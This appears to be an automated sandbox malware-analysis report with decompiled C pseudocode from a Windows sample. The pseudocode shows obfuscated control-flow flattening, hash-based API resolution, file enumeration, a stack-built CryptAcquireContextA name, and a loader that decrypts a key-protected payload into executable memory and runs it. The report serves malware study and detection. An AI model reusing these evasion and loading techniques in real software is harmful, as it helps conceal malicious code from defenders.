                                                      									asm("sbb eax, eax");
                                                      									_t33 =  ~_t35 & 0x1a078d34;
                                                      									goto L19;
                                                      								}
                                                      								if(_v1636.cFileName != _t50 || _v1590 != 0 && (_v1590 != _t50 || _v1588 != 0)) {
                                                      									if(_t48 != 0) {
                                                      										_t77 = E02302674(0x23091c0);
                                                      										_push( &(_v1636.cFileName));
                                                      										_push(_t78);
                                                      										_push(0x104);
                                                      										_push( &_v1044);
                                                      										 *((intOrPtr*)(E02302F84(0xa83808e5, 0xb436274a, 0x156)))();
                                                      										_t79 = _t79 + 0x14;
                                                      										E023028FB( &_v1044, _t48, _a4, _a8);
                                                      										E02302FDF(_t77);
                                                      										_t50 = 0x2e;
                                                      									}
                                                      								}
                                                      								_t21 = 0x29ccb448;
                                                      								continue;
                                                      							}
                                                      							if(_t21 != 0x3a3f7db0) {
                                                      								goto L23;
                                                      							}
                                                      							E02302F84(0xf568ce83, 0x8da84b58, 0x158);
                                                      							_t47 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                      							_t75 = _t47;
                                                      							if(_t75 == 0xffffffff) {
                                                      								return _t47;
                                                      							}
                                                      							_t21 = 0x2a749ba0;
                                                      							goto L1;
                                                      						}
                                                      						_t21 = 0x57934ae;
                                                      						L23:
                                                      					} while (_t21 != 0x3178f15b);
                                                      					return _t21;
                                                      				}
                                                      			}





















                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 02302975
                                                      • FindNextFileW.KERNELBASE(?,?), ref: 02302A62
                                                      • FindClose.KERNELBASE(?), ref: 02302ADD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 45f95acd56c1fb121fff134b48412b39a2892231906085a1dcee7a86d7ba6a36
                                                      • Instruction ID: 9b8d86044888946c7e726b90eaf97a9596da5bbc0a7921563c70066fc0ac4140
                                                      • Opcode Fuzzy Hash: 45f95acd56c1fb121fff134b48412b39a2892231906085a1dcee7a86d7ba6a36
                                                      • Instruction Fuzzy Hash: EF416720A083015BDA38A66888ECBBB62BACBD4314F04091AFD51C72C1DF76C994C773
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E02301DEC() {
                                                      				char _v4;
                                                      				char _v8;
                                                      				intOrPtr _v32;
                                                      				void* __ecx;
                                                      				void* _t19;
                                                      				signed int _t22;
                                                      				signed int _t28;
                                                      				void* _t31;
                                                      				intOrPtr* _t45;
                                                      				intOrPtr* _t46;
                                                      				intOrPtr _t47;
                                                      				void* _t64;
                                                      				void* _t76;
                                                      				signed int _t78;
                                                      				void* _t88;
                                                      
                                                      				_t45 = _t46;
                                                      				_t78 = 0x11df9f4a;
                                                      				_t76 = 0;
                                                      				while(1) {
                                                      					L1:
                                                      					_t47 =  *0x230a4bc; // 0x5b4c50
                                                      					do {
                                                      						while(1) {
                                                      							L2:
                                                      							_t88 = _t78 - 0x15231901;
                                                      							if(_t88 > 0) {
                                                      								break;
                                                      							}
                                                      							if(_t88 == 0) {
                                                      								_push( &_v4);
                                                      								_push( &_v8);
                                                      								_push(_t76);
                                                      								_push(0x8000);
                                                      								_push( *((intOrPtr*)(_t45 + 4)));
                                                      								_push( *_t45);
                                                      								_push(0x13);
                                                      								_push(0x10001);
                                                      								_t28 =  *((intOrPtr*)(E02302F84(0x76ea1e12, 0xd0a2c212, 0x1d7)))(); // executed
                                                      								asm("sbb esi, esi");
                                                      								_t78 = ( ~_t28 & 0xe96b696f) + 0x23ab6912;
                                                      								while(1) {
                                                      									L1:
                                                      									_t47 =  *0x230a4bc; // 0x5b4c50
                                                      									goto L2;
                                                      								}
                                                      							} else {
                                                      								if(_t78 == 0xb67f30a) {
                                                      									_t8 = _t47 + 4; // 0x5b4c54
                                                      									_push(_t76);
                                                      									_push(_t76);
                                                      									_push(0x8004);
                                                      									_push( *((intOrPtr*)(_t47 + 0x20)));
                                                      									_t31 =  *((intOrPtr*)(E02302F84(0x4836b0ed, 0x3901c464, 0x21a)))(); // executed
                                                      									if(_t31 != 0) {
                                                      										_t76 = 1;
                                                      									} else {
                                                      										_t78 = 0x132dd04d;
                                                      										while(1) {
                                                      											L1:
                                                      											_t47 =  *0x230a4bc; // 0x5b4c50
                                                      											goto L2;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									if(_t78 == 0xd16d281) {
                                                      										_t3 = _t47 + 0xc; // 0x5b4c5c
                                                      										_push(_t76);
                                                      										_push(_t76);
                                                      										_push(_v4);
                                                      										_push(_v8);
                                                      										_push( *((intOrPtr*)(_t47 + 0x20)));
                                                      										 *((intOrPtr*)(E02302F84(0x4836b0ed, 0xd3359e70, 0xa4)))(); // executed
                                                      										_push(_v32);
                                                      										asm("sbb esi, esi");
                                                      										_t78 = (_t78 & 0xf961461b) + 0x23ab6912;
                                                      										 *((intOrPtr*)(E02302F84(0xf568ce83, 0x70673eb, 0x90)))();
                                                      										L28:
                                                      										_t47 =  *0x230a4bc; // 0x5b4c50
                                                      										goto L29;
                                                      									} else {
                                                      										if(_t78 == 0xe3d60f3) {
                                                      											_push( *((intOrPtr*)(_t47 + 0xc)));
                                                      											 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x1802ec4f, 0x248)))();
                                                      											_t78 = 0x23ab6912;
                                                      											while(1) {
                                                      												L1:
                                                      												_t47 =  *0x230a4bc; // 0x5b4c50
                                                      												goto L2;
                                                      											}
                                                      										} else {
                                                      											if(_t78 == 0x11df9f4a) {
                                                      												_t64 = 0x28;
                                                      												_t47 = E02303037(_t64);
                                                      												 *0x230a4bc = _t47;
                                                      												if(_t47 != 0) {
                                                      													_t78 = 0x1c9fb854;
                                                      													continue;
                                                      												}
                                                      											} else {
                                                      												if(_t78 != 0x132dd04d) {
                                                      													goto L29;
                                                      												} else {
                                                      													_push( *((intOrPtr*)(_t47 + 0x10)));
                                                      													 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x1802ec4f, 0x248)))();
                                                      													_t78 = 0xe3d60f3;
                                                      													while(1) {
                                                      														L1:
                                                      														_t47 =  *0x230a4bc; // 0x5b4c50
                                                      														goto L2;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L22:
                                                      							return _t76;
                                                      						}
                                                      						if(_t78 == 0x1c9fb854) {
                                                      							_push(0xf0000040);
                                                      							_push(0x18);
                                                      							_push(_t76);
                                                      							_t16 = _t47 + 0x20; // 0x5b4c70
                                                      							_push(_t76);
                                                      							_t19 =  *((intOrPtr*)(E02302F84(0x4836b0ed, 0x5c0bdb4c, 0x15)))(); // executed
                                                      							if(_t19 == 0) {
                                                      								_t78 = 0x2dd1fc81;
                                                      								goto L28;
                                                      							} else {
                                                      								_t78 = 0x15231901;
                                                      								goto L1;
                                                      							}
                                                      						} else {
                                                      							if(_t78 == 0x1d0caf2d) {
                                                      								_t14 = _t47 + 0x10; // 0x5b4c60
                                                      								_push(1);
                                                      								_push(0x660e);
                                                      								_push( *((intOrPtr*)(_t47 + 0x20)));
                                                      								_t22 =  *((intOrPtr*)(E02302F84(0x4836b0ed, 0x27107c81, 0x189)))(); // executed
                                                      								asm("sbb esi, esi");
                                                      								_t78 = ( ~_t22 & 0xfd2a9217) + 0xe3d60f3;
                                                      								while(1) {
                                                      									L1:
                                                      									_t47 =  *0x230a4bc; // 0x5b4c50
                                                      									goto L2;
                                                      								}
                                                      							} else {
                                                      								if(_t78 == 0x23ab6912) {
                                                      									_push(_t76);
                                                      									_push( *((intOrPtr*)(_t47 + 0x20)));
                                                      									 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x3ffb132a, 0xaf)))();
                                                      									_t78 = 0x2dd1fc81;
                                                      									while(1) {
                                                      										L1:
                                                      										_t47 =  *0x230a4bc; // 0x5b4c50
                                                      										goto L2;
                                                      									}
                                                      								} else {
                                                      									if(_t78 != 0x2dd1fc81) {
                                                      										goto L29;
                                                      									} else {
                                                      										E02302FDF(_t47);
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L22;
                                                      						L29:
                                                      					} while (_t78 != 0x63522ad);
                                                      					goto L22;
                                                      				}
                                                      			}


                                                      APIs
                                                      • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?), ref: 02301F60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CryptDecodeObject
                                                      • String ID: PL[
                                                      • API String ID: 1207547050-864583639
                                                      • Opcode ID: 79bf8892b9833cd52c63e68b061405b8272adf4d473dbe3321ba98931d993c7c
                                                      • Instruction ID: f57950964b088cf15bc68d1b901f35d88f63b395ca79b19fed01e2b1c704c6fb
                                                      • Opcode Fuzzy Hash: 79bf8892b9833cd52c63e68b061405b8272adf4d473dbe3321ba98931d993c7c
                                                      • Instruction Fuzzy Hash: A2519C73B4431567C93865284CE4E6B615F9BC8B55B29016EFC89AF2C0CB62CD42C7F2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E00404142(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t73;
                                                      				struct HINSTANCE__* _t78;
                                                      				_Unknown_base(*)()* _t79;
                                                      				struct HINSTANCE__* _t81;
                                                      				signed int _t92;
                                                      				signed int _t94;
                                                      				unsigned int _t97;
                                                      				void* _t113;
                                                      				unsigned int _t115;
                                                      				signed short _t123;
                                                      				unsigned int _t124;
                                                      				int _t129;
                                                      				int _t130;
                                                      				_Unknown_base(*)()* _t131;
                                                      				signed short _t133;
                                                      				unsigned int _t134;
                                                      				intOrPtr _t143;
                                                      				void* _t144;
                                                      				int _t145;
                                                      				int _t146;
                                                      				signed int _t164;
                                                      				void* _t167;
                                                      				signed int _t169;
                                                      				void* _t170;
                                                      				int _t172;
                                                      				signed int _t176;
                                                      				void* _t177;
                                                      				CHAR* _t181;
                                                      				void* _t183;
                                                      				void* _t184;
                                                      
                                                      				_t167 = __edx;
                                                      				_t184 = _t183 - 0x118;
                                                      				_t181 = _t184 - 4;
                                                      				_t73 =  *0x443590; // 0x8ffedb05
                                                      				_t181[0x118] = _t73 ^ _t181;
                                                      				_push(0x58);
                                                      				E0041F6EA(E00431C66, __ebx, __edi, __esi);
                                                      				_t169 = 0;
                                                      				 *(_t181 - 0x40) = _t181[0x124];
                                                      				 *(_t181 - 0x14) = 0;
                                                      				 *(_t181 - 0x10) = 0;
                                                      				_t78 = GetModuleHandleA("kernel32.dll");
                                                      				 *(_t181 - 0x18) = _t78;
                                                      				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                      				if(_t79 == 0) {
                                                      					if(GetVersion() >= 0) {
                                                      						_t81 = GetModuleHandleA("ntdll.dll");
                                                      						if(_t81 != 0) {
                                                      							 *(_t181 - 0x14) = 0;
                                                      							EnumResourceLanguagesA(_t81, 0x10, 1, E004038EB, _t181 - 0x14);
                                                      							if( *(_t181 - 0x14) != 0) {
                                                      								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                      								_t145 = _t97 & 0x3ff;
                                                      								 *(_t181 - 0x34) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                      								 *(_t181 - 0x30) = ConvertDefaultLocale(_t145);
                                                      								 *(_t181 - 0x10) = 2;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						 *(_t181 - 0x18) = 0;
                                                      						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                      							 *(_t181 - 0x44) = 0x10;
                                                      							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                      								_t113 = E0041FD26( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                      								_t184 = _t184 + 0xc;
                                                      								if(_t113 == 1) {
                                                      									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                      									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                      									_t146 = _t115 & 0x3ff;
                                                      									 *(_t181 - 0x34) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                      									 *(_t181 - 0x30) = ConvertDefaultLocale(_t146);
                                                      									 *(_t181 - 0x10) = 2;
                                                      								}
                                                      							}
                                                      							RegCloseKey( *(_t181 - 0x18));
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t123 =  *_t79() & 0x0000ffff;
                                                      					 *(_t181 - 0x14) = _t123;
                                                      					_t124 = _t123 & 0x0000ffff;
                                                      					_t164 = _t124 & 0x3ff;
                                                      					 *(_t181 - 0x1c) = _t164;
                                                      					_t129 = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164); // executed
                                                      					 *(_t181 - 0x34) = _t129;
                                                      					_t130 = ConvertDefaultLocale( *(_t181 - 0x1c)); // executed
                                                      					 *(_t181 - 0x30) = _t130;
                                                      					 *(_t181 - 0x10) = 2;
                                                      					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                      					if(_t131 != 0) {
                                                      						_t133 =  *_t131() & 0x0000ffff;
                                                      						 *(_t181 - 0x14) = _t133;
                                                      						_t134 = _t133 & 0x0000ffff;
                                                      						_t172 = _t134 & 0x3ff;
                                                      						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                      						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                      						 *(_t181 - 0x10) = 4;
                                                      					}
                                                      					_t169 = 0;
                                                      				}
                                                      				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                      				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                      				_t181[0x105] = 0;
                                                      				_t181[0x104] = 0;
                                                      				if(GetModuleFileNameA(0x400000, _t181, 0x105) != _t169) {
                                                      					_t143 = 0x20;
                                                      					E0041F330(_t169, _t181 - 0x64, _t169, _t143);
                                                      					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                      					 *(_t181 - 0x5c) = _t181;
                                                      					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                      					 *(_t181 - 0x48) = 0x400000;
                                                      					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                      					E00403901(_t181 - 0x3c, 0x400000, 0xffffffff);
                                                      					 *(_t181 - 4) = _t169;
                                                      					if(E004039B1(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                      						E004039E7(_t181 - 0x3c);
                                                      					}
                                                      					_t176 = 0;
                                                      					if( *(_t181 - 0x10) <= _t169) {
                                                      						L23:
                                                      						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                      						E00403FD8(_t181 - 0x3c);
                                                      						_t92 = _t169;
                                                      						goto L24;
                                                      					} else {
                                                      						while(1) {
                                                      							_t94 = E00403F0B(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]); // executed
                                                      							if(_t94 != _t169) {
                                                      								break;
                                                      							}
                                                      							_t176 =  &(1[_t176]);
                                                      							if(_t176 <  *(_t181 - 0x10)) {
                                                      								continue;
                                                      							}
                                                      							goto L23;
                                                      						}
                                                      						_t169 = _t94;
                                                      						goto L23;
                                                      					}
                                                      				} else {
                                                      					_t92 = 0;
                                                      					L24:
                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                      					_pop(_t170);
                                                      					_pop(_t177);
                                                      					_pop(_t144);
                                                      					return E0041E5DF(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                      				}
                                                      			}

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00404161
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
                                                      • ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
                                                      • ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 00404209
                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248
                                                      • GetVersion.KERNEL32 ref: 0040425D
                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00404282
                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004042A7
                                                      • _sscanf.LIBCMT ref: 004042C7
                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 004042FC
                                                      • ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404302
                                                      • RegCloseKey.ADVAPI32(?), ref: 00404311
                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00404321
                                                      • EnumResourceLanguagesA.KERNEL32 ref: 0040433C
                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 0040436D
                                                      • ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404373
                                                      • _memset.LIBCMT ref: 0040438D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                      • API String ID: 434808117-483790700
                                                      • Opcode ID: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
                                                      • Instruction ID: 73e1e2af98abfcea5160a2e7c85213876d0caf47e62fbe05c0c2028d5027c9cb
                                                      • Opcode Fuzzy Hash: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
                                                      • Instruction Fuzzy Hash: A1814CB1E002199BCB10DFA5DC45AFEBBB8EB98304F10052BF955F3280DB789A45CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 44 401d20-401dfb call 401cc0 LoadLibraryW GetProcAddress 48 401e01-401e12 44->48 49 401dfd-401dff 44->49 52 401e14-401e16 48->52 53 401e18 48->53 50 401e1d-401e20 49->50 52->50 53->50
                                                      C-Code - Quality: 33%
                                                      			E00401D20(void* __eflags) {
                                                      				_Unknown_base(*)()* _v8;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v52;
                                                      				intOrPtr _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				intOrPtr _v68;
                                                      				intOrPtr _v72;
                                                      				intOrPtr _v76;
                                                      				intOrPtr _v80;
                                                      				intOrPtr _v84;
                                                      				intOrPtr _v88;
                                                      				char _v92;
                                                      				char _v96;
                                                      				CHAR* _v100;
                                                      				void* _t37;
                                                      
                                                      				_v92 = 0x43;
                                                      				_v88 = 0x72;
                                                      				_v84 = 0x79;
                                                      				_v80 = 0x70;
                                                      				_v76 = 0x74;
                                                      				_v72 = 0x41;
                                                      				_v68 = 0x63;
                                                      				_v64 = 0x71;
                                                      				_v60 = 0x75;
                                                      				_v56 = 0x69;
                                                      				_v52 = 0x72;
                                                      				_v48 = 0x65;
                                                      				_v44 = 0x43;
                                                      				_v40 = 0x6f;
                                                      				_v36 = 0x6e;
                                                      				_v32 = 0x74;
                                                      				_v28 = 0x65;
                                                      				_v24 = 0x78;
                                                      				_v20 = 0x74;
                                                      				_v16 = 0x41;
                                                      				_t21 =  &_v92; // 0x43
                                                      				_v100 = E00401CC0(__eflags, _t21, 0x14);
                                                      				_v8 = 0;
                                                      				_v8 = GetProcAddress(LoadLibraryW(L"ADVAPI32.DLL"), _v100);
                                                      				_v96 = 0;
                                                      				_push(0);
                                                      				_push(1);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push( &_v96); // executed
                                                      				if(_v8() != 0) {
                                                      					_t37 = _v8( &_v96, 0, 0, 1, 8);
                                                      					__eflags = _t37;
                                                      					if(_t37 != 0) {
                                                      						return 1;
                                                      					}
                                                      					return 0;
                                                      				}
                                                      				return 0;
                                                      			}


                                                      APIs
                                                        • Part of subcall function 00401CC0: _malloc.LIBCMT ref: 00401CCA
                                                      • LoadLibraryW.KERNEL32(ADVAPI32.DLL,?), ref: 00401DD3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401DDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc_malloc
                                                      • String ID: A$A$ADVAPI32.DLL$C$CryptAcquireContextA$c$e$e$i$n$o$q$r$t$t$u$x
                                                      • API String ID: 2391205483-810849556
                                                      • Opcode ID: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
                                                      • Instruction ID: 83cb7c6687cd2237a667902df97d767b3d8751ad43d865d9c8d3f020bb7d5c88
                                                      • Opcode Fuzzy Hash: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
                                                      • Instruction Fuzzy Hash: A521B6B0D44308EAEB10CFD0D8497DEBBB5BB04748F104119E5087A2D0D7FE6A588F94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 76%
                                                      			E00401E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				int _v8;
                                                      				char _v16;
                                                      				intOrPtr _v20;
                                                      				int _v24;
                                                      				char _v28;
                                                      				int _v32;
                                                      				_Unknown_base(*)()* _v36;
                                                      				_Unknown_base(*)()* _v40;
                                                      				intOrPtr _v44;
                                                      				long _v48;
                                                      				struct HINSTANCE__* _v52;
                                                      				void* _v56;
                                                      				intOrPtr _v72;
                                                      				intOrPtr _v100;
                                                      				CHAR* _v104;
                                                      				long _v112;
                                                      				long _v116;
                                                      				intOrPtr _v120;
                                                      				void* __ebp;
                                                      				signed int _t74;
                                                      				void* _t97;
                                                      				signed int _t152;
                                                      				void* _t158;
                                                      				intOrPtr _t161;
                                                      
                                                      				_t158 = __eflags;
                                                      				_push(0xffffffff);
                                                      				_push(E00431B18);
                                                      				_push( *[fs:0x0]);
                                                      				_t74 =  *0x443590; // 0x8ffedb05
                                                      				_push(_t74 ^ _t152);
                                                      				 *[fs:0x0] =  &_v16;
                                                      				_v120 = __ecx;
                                                      				E00406041(__ebx, _v120, __edi);
                                                      				_push(GetSystemMenu( *(_v120 + 0x20), 0));
                                                      				_v20 = E0040DEED(__ebx,  *(_v120 + 0x20), __edi, __esi, _t158);
                                                      				if(_v20 != 0) {
                                                      					E00402890( &_v28);
                                                      					_v8 = 0;
                                                      					_push(0x68);
                                                      					_v72 = E0040DDFE();
                                                      					if(_v72 != 0) {
                                                      						E00402910( &_v28, _v72, 0x68);
                                                      					}
                                                      					_v100 =  *((intOrPtr*)(_v28 - 0xc));
                                                      					_t161 = _v100;
                                                      					_t162 = _t161 == 0x00000000 & 0x000000ff;
                                                      					if((_t161 == 0x00000000 & 0x000000ff) == 0) {
                                                      						AppendMenuA( *(_v20 + 4), 0x800, 0, 0);
                                                      						_v104 = _v28;
                                                      						AppendMenuA( *(_v20 + 4), 0, 0x10, _v104);
                                                      					}
                                                      					_v32 = 0;
                                                      					_v56 = 0;
                                                      					_v48 = 0;
                                                      					_v40 = 0;
                                                      					_t97 = E00401D20(_t162); // executed
                                                      					_t163 = _t97;
                                                      					if(_t97 == 0) {
                                                      						_v40 = GetProcAddress(0x400000, "UUACZDADWAJJJJJ");
                                                      					}
                                                      					_v52 = E00401A10(L"kernel32.dll");
                                                      					_v36 = GetProcAddress(_v52, "VirtualAlloc");
                                                      					_v32 = E00401A70(_t163, 0x3d9, 0x11c1, 0x409,  &_v48);
                                                      					if(_v32 != 0) {
                                                      						_v56 = VirtualAlloc(0, _v48, 0x3000, 0x40);
                                                      					}
                                                      					if(_v56 != 0) {
                                                      						_v40(_v32, _v48, "6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q", 0x76, _v56);
                                                      					}
                                                      					_v24 = _v56;
                                                      					_v44 = _v24();
                                                      					_v8 = 0xffffffff;
                                                      					E00401320( &_v28);
                                                      				}
                                                      				_v112 =  *((intOrPtr*)(_v120 + 0x74));
                                                      				SendMessageA( *(_v120 + 0x20), 0x80, 1, _v112);
                                                      				_v116 =  *((intOrPtr*)(_v120 + 0x74));
                                                      				SendMessageA( *(_v120 + 0x20), 0x80, 0, _v116);
                                                      				if( *((intOrPtr*)(_v120 + 0x120)) == 0) {
                                                      					__eflags = _v120 + 0x78;
                                                      					E0040CA8B(_v120 + 0x78, 0);
                                                      				} else {
                                                      					E0040CA8B(_v120 + 0x78, 1);
                                                      				}
                                                      				if( *((intOrPtr*)(_v120 + 0x130)) == 0) {
                                                      					__eflags = _v120 + 0xcc;
                                                      					E0040CA8B(_v120 + 0xcc, 0);
                                                      				} else {
                                                      					E0040CA8B(_v120 + 0xcc, 1);
                                                      				}
                                                      				 *[fs:0x0] = _v16;
                                                      				return 1;
                                                      			}

                                                      APIs
                                                      • GetSystemMenu.USER32(?,00000000,8FFEDB05), ref: 00401E69
                                                      • AppendMenuA.USER32 ref: 00401EDA
                                                      • AppendMenuA.USER32 ref: 00401EF5
                                                      • GetProcAddress.KERNEL32(00400000,UUACZDADWAJJJJJ), ref: 00401F2A
                                                      • GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 00401F4C
                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401F86
                                                      • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00401FE1
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 00402002
                                                      Strings
                                                      • kernel32.dll, xrefs: 00401F33
                                                      • 6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q, xrefs: 00401F98
                                                      • VirtualAlloc, xrefs: 00401F43
                                                      • UUACZDADWAJJJJJ, xrefs: 00401F20
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
